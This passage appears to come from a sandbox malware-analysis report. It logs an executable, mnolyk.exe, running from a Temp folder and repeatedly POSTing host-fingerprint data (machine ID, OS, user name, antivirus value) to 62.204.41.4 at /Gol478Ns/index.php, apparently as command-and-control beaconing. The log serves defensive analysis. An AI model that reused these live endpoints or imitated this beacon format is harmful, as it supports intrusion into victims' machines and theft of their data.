Feb 7, 2023 19:57:22.856558084 CET	259	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
680	192.168.2.5	50393	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:14.802336931 CET	925	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:14.866986990 CET	925	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
681	192.168.2.5	50394	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:15.033221960 CET	926	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:15.097959042 CET	926	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
682	192.168.2.5	50395	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:15.267608881 CET	927	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:15.331311941 CET	927	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
683	192.168.2.5	50396	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:15.510797977 CET	928	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:15.574445963 CET	928	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
684	192.168.2.5	50397	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:15.752526999 CET	929	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:15.815166950 CET	929	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
685	192.168.2.5	50398	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:15.996201038 CET	930	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:16.062393904 CET	930	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
686	192.168.2.5	50399	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:16.236682892 CET	931	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:16.300178051 CET	931	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
687	192.168.2.5	50400	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:16.471395016 CET	932	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:16.535162926 CET	932	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
688	192.168.2.5	50401	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:16.704967022 CET	933	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:16.767642021 CET	933	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
689	192.168.2.5	50402	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:16.938937902 CET	934	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:17.002080917 CET	934	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
69	192.168.2.5	49775	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:23.025798082 CET	260	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:23.095626116 CET	260	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
690	192.168.2.5	50403	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:17.175192118 CET	935	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:17.241225958 CET	935	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
691	192.168.2.5	50404	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:17.416361094 CET	936	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:17.480040073 CET	936	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
692	192.168.2.5	50405	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:17.657437086 CET	937	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:17.719861031 CET	937	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
693	192.168.2.5	50406	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:17.910531998 CET	938	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:17.976032019 CET	938	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
694	192.168.2.5	50407	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:18.142046928 CET	939	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:18.206909895 CET	939	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
695	192.168.2.5	50408	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:18.376565933 CET	940	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:18.439316988 CET	940	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
696	192.168.2.5	50409	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:18.614092112 CET	941	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:18.677609921 CET	941	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
697	192.168.2.5	50410	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:18.845590115 CET	942	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:18.909425974 CET	942	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
698	192.168.2.5	50411	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:19.306269884 CET	943	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:19.371829033 CET	943	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
699	192.168.2.5	50412	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:19.610272884 CET	944	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:19.674258947 CET	944	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.5	49704	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
